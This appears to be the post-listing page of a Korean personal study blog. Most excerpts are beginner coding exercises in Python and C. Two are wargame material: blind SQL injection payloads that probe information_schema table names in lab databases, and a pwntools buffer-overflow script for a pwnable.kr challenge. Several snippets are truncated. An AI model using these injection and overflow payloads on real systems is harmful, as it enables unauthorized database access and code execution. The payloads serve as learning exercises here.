본문 바로가기

호그와트

(367)
백준 10818번 파이썬 n = int(input()) lst=list(map(int, input().split())) panda = max(lst) coca = min(lst) print(coca, panda)
아이다 카카메론 import base64 message = "nimda" for i in range(20): message_bytes = message.encode('ascii') base64_bytes = base64.b64encode(message_bytes) base64_message = base64_bytes.decode('ascii') message = base64_message print(base64_message)
계단식으로 별을 출력합시다 a = int(input()) for i in range(a): for j in range(a): if j
확실히 미친 짓을 하는 방법 length((select table_name from infomation_schema.tables where table_schema = 'blind_db' limit 0,1)) = 1 no = 1 and ascii(substr((select table_name from information_schema.tables where table_schema = 'blind_db' limit 0,1),1,1))=115 1 ' or length((select table_name from information_schema.tables where table_schema='WebHackTest' limit 0,1)) >= 1 1' or select DISTINCT TABLE_TYPE from information_sch..
우리 모두 천재가 되어봅시다 참 쉽죠?
가볍게 정렬하는 방법 #include int main(void) { int i; int a; int temp; int numArr[1024] = {0,}; scanf("%d", &a); for (i=0; i
easy attack from pwn import * ​ r = remote('pwnable.kr', 9000) ​ payload = b'A'*52 payload += b'\xbe\xba\xfe\xca' ​ r.send(payload) r.interactive()
감사합니다 causa sui #include ​ int main(void) { int a, b; ​ scanf("%d %d", &a, &b); ​ if (a == 0 || b == 0) { printf("다시 숫자를 입력하세요"); } if (a > 0 && b > 0) { printf("1"); } else if (a > 0 && b 0) { printf("2"); } return 0; }